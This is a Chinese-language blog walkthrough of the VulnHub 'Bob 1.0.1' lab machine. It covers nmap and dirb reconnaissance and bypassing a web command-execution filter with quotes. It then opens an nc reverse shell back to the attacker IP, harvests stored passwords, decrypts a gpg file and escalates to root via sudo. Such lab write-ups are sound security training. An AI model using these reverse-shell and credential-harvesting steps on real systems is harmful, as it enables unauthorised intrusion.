Bob_ 1.0.1靶机渗透

于 2024-10-11 23:07:24 发布
阅读量348 收藏 8
点赞数 3
分类专栏: vulnhub 文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/142865321
版权

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/bob/Bob_v1.0.1.ova ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/c4ede7d1724d430e1c446b8c49e3e42d.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知Bob: 1.0.1的一个ip地址为192.168.47.173

扫描Bob: 1.0.1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.173 ```

发现该靶机开放了21,80,25468端口

目录扫描

```plain dirb http://192.168.47.173 ```

信息收集

进入网站

没找到有用信息

拼接扫出来的robots.txt

拼接/login.php访问被拒绝

拼接/passwords.html

没得到有用信息

拼接/dev_shell.php

得到一个命令执行的输入框

输入ls没有正常执行

尝试用’'给引起来

发现有回显了

获取shell

kali开启监听 
nc -lvvp 7272


'nc' -c /bin/bash 192.168.47.129 7272

反弹成功

获取交互式shell

python -c "import pty; pty.spawn('/bin/bash')"

提权

cd到home目录下,找到4个用户目录

到bob用户看看,发现有个可能存放password的文件 .old_passwordfile.html

查看该文件找到了jc和seb用户的密码

继续翻找

在 /bob/Documents 目录下发现了加密文件login.txt.gpg和Secret的目录

查看一下

在Secret深处找到一个sh文件,经过研究发现这是一首藏头诗,得到密钥HARPOCRATES

回到Documents目录尝试解密login.txt.gpg

gpg -d login.txt.gpg

权限不够

查看另一个文件

感觉没啥用

到 elliot 用户home目录下看看有没有有用信息

发现theadminisdumb.txt文件,里面内容应该是 elliot 写给员工的信

这里也提到 jc 密码为Qwerty,并且他将自己密码改为了theadminisdumb

另外两个用户并未在其目录下找到有用的信息

切换到jc用户

ssh jc@192.168.47.173 -p 25468

看看刚刚/bob/Documents目录下没权限的文件是否能解密

需要密码,输入刚刚到的密钥HARPOCRATES

得到bob的密码为b0bcat_

切换bob用户

ssh bob@192.168.47.173 -p 25468

登陆成功

查看可利用命令

sudo -l

发现是ALL

直接sudo su提权

提权成功
好小子,离成功又近一步!!!

蚂蚱.top
关注
专栏目录
BOB1.0.1靶机渗透攻略.pdf
09-21
本篇文档详细介绍了针对名为 Bob 1.0.1 的靶机进行渗透攻击的实战攻略。靶机 Bob 1.0.1 可以在 VulnHub 上找到,这是一个提供实战环境的网站,允许用户下载靶场并进行渗透测试。 渗透攻击过程首先需要使用 Nmap ...
GaussDB_100_1.0.1-DATABASE-REDHAT-64bit.tar.gz
04-14
本篇文章将详细阐述如何在Red Hat Enterprise Linux 64位环境下安装GaussDB 100的1.0.1版本,以及在单机部署中的关键步骤,这些都是基于大量实践和实验的总结。 首先,我们需要准备的是名为"GaussDB_100_1.0.1-...
Bob_v1.0.1靶机渗透测试
weixin_58786230的博客
08-03 336
【代码】Bob_v1.0.1靶机渗透测试。
VulnHub:Bob 1.0.1靶机实战
Aukum的博客
07-08 841
VulnHub-Bob 1.0.1靶机。通过常规信息收集,借助&符号绕过过滤,通过命令执行进行反弹shell。主要考察的是Linux shell基础和信息收集能力。
记:渗透测试-靶机训练Bob1.0.1
Anderlos
06-24 989
前言 来CSDN划水有几年了,一直处于学习的状态,直到今天才发第一篇文章,就以基础渗透作为开篇吧,技术不到位还望大佬们手下留情,话不多说直接进入分享 首先请出靶机 靶机界面 然后进入kali(其实是为了分享一波桌面) 首先确定一点问题就是,我们需要知道对方IP地址是多少(因为是在虚拟机环境内所以注定IP地址不会太多,所以我们既已知在一个网段内,只需要扫描出这个网段的所有主机即可) ip addr 先通过ip addr来确认一下我们...
vulnhub靶场,Bob_v1.0.1
kukudeshuo的博客
08-27 1021
vulnhub靶场,Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
Vulnhub Bob 1.0.1靶机渗透测试详解)
2301_78721909的博客
08-05 319
Vulnhub Bob 1.0.1靶机 渗透测试详解(from wuhu)
【vulnhub靶场】Bob_v1.0.1靶机提权
qq_46421742的博客
07-29 313
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
VulnHub-Bob靶机详细渗透过程
MRS_jianai的博客
12-27 926
VulnHub-Bob靶机详细渗透过程
BOB靶机渗透实战-----攻略(大神勿喷)
z2560088的博客
09-21 2070
准备工作 靶场 Bob: 1.0.1 ~ VulnHub 攻击工具kali虚拟机 直接双击打开即可添加到虚拟机。打开后网卡使用NAT模式。 没有给用户名和密码。(给了就没有攻击的必要了 hhh) 开始攻击 打开kali 使用nmap 扫描同网段下的ip和端口(因为靶机也用的NAT模式的网卡,所以按理说应该被分在了与kali虚拟机同网段的某一个ip地址) 我的kali ip 地址为192.168.160.129 nmap -sP 192.168.160.0/24 ...
vulnhub Bob: 1.0.1
箭雨镜屋
04-27 1608
渗透思路:nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
geronimo-jta_1.0.1B_spec-1.0.1.jar
02-24
java运行依赖jar包
网件 NETGEAR R6800 固件 V1.1.0.42_1.0.1(多国语言版)
04-03
- 如果遇到问题,可查阅官方提供的“Release Notes”(R6800-V1.1.0.42_1.0.1_Release_Notes.html)文件,了解详细变更日志和升级指南。 总的来说,网件(NETGEAR)R6800固件V1.1.0.42_1.0.1的更新旨在提高设备的...
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz
04-23
GaussDB_100_1.0.1-DATABASE-EULER20SP8-64bit.tar.gz 这个压缩包文件,显然是华为云数据库产品GaussDB的一个特定版本。GaussDB是华为自主研发的分布式数据库系统,它在设计上融合了最新的数据库技术和华为多年的...
android 全面屏最底部栏沉浸式
sdaujz的博客
10-04 433
Android 系统 Bar 沉浸式完美兼容方案自 Android 5.0 版本,Android 带来了沉浸式系统 ba - 掘金 (juejin.cn)Activity的onCreate方法中添加。
Android 编译使用哪个key签名?
最新发布
m0_63526467的博客
10-10 519
Android 编译使用哪个key签名?
20241004给荣品RD-RK3588-AHD开发板刷Rockchip原厂的Android12【HDMI0显示】
南岭笑笑生之家
10-04 1818
Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rd-rk3588s-AHD.dts。Z:\82临时了evb4+rp3588s_android12\kernel-5.10\arch\arm64\boot\dts\rockchip\rp-lcd-hdmi0.dtsi。1、配置RK3588S的默认DTS为:rk3588s-evb4-lp4x-v10.dts。【Android12需要】配置为默认HDMI0显示。
PHP中for 和 foreach 有什么区别
sheji888的专栏
10-07 881
for和foreach是PHP中两种常用的循环控制结构,它们各自具有独特的特点和适用场景。for循环更加灵活,适用于需要明确控制循环次数或进行复杂计算的场景;而foreach循环则更加简洁直观,主要用于遍历数组或对象集合。在选择循环结构时,应根据具体需求和场景进行权衡和选择。同时,需要注意避免在foreach循环中直接修改原数组,以免导致不可预测的行为。
filezilla_server_1.0.1设置
08-08
FileZilla Server 1.0.1 是一个功能强大的FTP服务器软件,用于在计算机或服务器上搭建FTP服务器。以下是关于如何设置FileZilla Server 1.0.1的说明: 1. 下载并安装:首先,从官方网站上下载FileZilla Server 1.0.1的安装程序。然后,运行安装程序并按照提示完成安装过程。 2. 启动软件:安装完成后,启动FileZilla Server 1.0.1。在启动界面上,你会看到"Welcome to the FileZilla Server Installation Wizard"(欢迎使用FileZilla Server安装向导)。 3. 创建管理员帐户:首次运行软件时,你需要创建一个管理员帐户。点击"Next"(下一步),然后在"Server Configuration"(服务器配置)界面上选择"Create a new user called 'admin'"(创建名为 'admin' 的新用户),并输入相应的密码。点击"Next"(下一步)完成管理员帐户的创建。 4. 配置FTP服务器:在"Server Configuration"(服务器配置)界面上,你可以设置FTP服务器的端口、传输模式、加密选项等。根据你的需求进行相应的配置,并点击"Next"(下一步)。 5. 选择默认共享文件夹:在"Shared Folders"(共享文件夹)界面上,你可以选择默认的共享文件夹。你可以点击"Add"(添加)按钮添加需要共享的文件夹,并为每个文件夹指定相应的权限。点击"Next"(下一步)。 6. 配置访问权限:在"User Settings"(用户设置)界面上,你可以为各个用户定义不同的访问权限。点击"Add"(添加)按钮,输入相应的用户名和密码,并为其选择或创建所需的目录权限。点击"Next"(下一步)。 7. 完成设置:在"Groups"(组)界面上,你可以创建用户组,并将用户分配到相应的组中。然后,点击"Next"(下一步)。 8. 确认设置:在"Confirmation"(确认)界面上,你可以查看并确认所做的设置。如果一切都正确,点击"Install"(安装)按钮开始安装。 9. 完成安装:安装完成后,点击"Done"(完成)按钮退出安装向导。你的FTP服务器已经成功设置和安装。 请注意,以上只是基本设置过程的概述。根据你的具体需求,你还可以进一步配置和调整FileZilla Server 1.0.1以满足你的要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值